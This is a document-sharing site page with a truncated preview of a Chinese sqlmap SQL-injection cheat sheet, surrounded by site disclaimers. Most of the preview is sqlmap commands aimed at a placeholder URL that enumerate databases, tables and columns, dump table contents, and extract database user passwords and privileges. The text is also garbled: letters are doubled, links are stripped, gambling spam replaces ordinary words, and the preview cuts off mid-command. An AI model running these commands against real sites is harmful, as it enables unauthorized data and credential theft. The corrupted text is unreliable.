网站大量收购闲置独家精品文档,联系QQ:2885784924

sqlmap技术手册.pdf

  1. 1、本文档共6页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
sqlmap技术手册

Sqlmap 必威体育精装版测试文档 Email:linuxseclab@ 1 sql sqlmap sql sqlmap 测试许多款ssqqll注入工具 最终还是发现ssqqllmmaapp 最为强悍 谁用谁知道! sql : ) sql : ) 赶紧抛弃掉手上一大堆ssqqll注入工具吧 :: )) ubuntu 10.10 windows 7(x64) sqlmap/1.0-dev (r4405) ubuntu 10.10 windows 7(x64) sqlmap/1.0-dev (r4405) 测试环境:uubbuunnttuu 1100..1100 wwiinnddoowwss 77((xx6644)) ssqqllmmaapp//11..00--ddeevv ((r) 如使用过程中出错 请使用下面最近更新的稳定版本: /c0adthmqf1 更新升级 : sqlmap -update svn checkout /sqlmap/trunk/sqlmap sqlmap-dev 帮助:::: sqlmap -h 官方必威体育精装版文档:/doc/README.html ****************** *************** ****************** *************** ************************************基本步骤****************************** sqlmap -u http://url/news?id=1 --current-user #获取当前用户名称 sqlmap -u /news?id=1 --current-db #获取当前数 据库名称 sqlmap -u /news?id=1 --tables -D db_name #列 表名 sqlmap -u http://url/news?id=1 --columns -T tablename users-D db_name -v 0 #列字段 sqlmap -u http://url/news?id=1 --dump -C column_name -T table_name -D db_name -v 0 #获取字段内容 更多技术信息请访问:/nginxshell Sqlmap 必威体育精装版测试文档 Email:linuxseclab@ 2 ****************** ****************** ****************** ****************** ************************************信息获取************************************ sqlmap -u http://url/news?id=1 --dbms Mysql --users # dbms 指定数 据库类型 sqlmap -u http://url/news?id=1 --users #列数据库用户 sqlmap -u http://url/news?id=1 --dbs#列数据库 sqlmap -u http://url/news?id=1 --passwords #数据库用户密码 sqlmap -u http://url/news?id=1 --passwords-U root -v 0 #列出指定用户 数据库密码 sqlmap -u http://url/news?id=1 --dump -C password,user,id -T tablename -D db_name --start 1 --stop 20 #列出指定字段,列出20 条 sqlmap -u http://url/news?id=1 --dump-all -v 0 #列出所有数据库所有表 sqlmap -u http://url/news?id=1 --privileges #查看权限 sqlmap -u

文档评论(0)

xcs88858 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

版权声明书
用户编号:8130065136000003

1亿VIP精品文档

相关文档